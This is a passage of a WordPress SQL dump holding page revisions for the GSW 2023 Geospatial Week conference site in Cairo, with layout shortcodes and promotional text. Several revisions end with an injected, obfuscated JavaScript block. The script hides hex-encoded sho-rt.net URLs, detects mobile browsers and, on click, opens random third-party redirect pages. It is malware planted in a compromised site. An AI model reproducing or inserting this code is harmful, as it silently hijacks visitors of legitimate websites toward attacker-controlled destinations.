_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:07:38','2022-11-09 15:07:38','',3066,'https://gsw2023.com/?p=3127',0,'revision','',0),
(3128,1,'2022-11-09 15:08:36','2022-11-09 15:08:36','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_size=\"large\" awb_image_background_size=\"contain\" awb_image_background_position=\"1% 150%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:08:36','2022-11-09 15:08:36','',3066,'https://gsw2023.com/?p=3128',0,'revision','',0),
(3129,1,'2022-11-09 15:09:15','2022-11-09 15:09:15','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"contain\" awb_image_background_position=\"0% 100%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 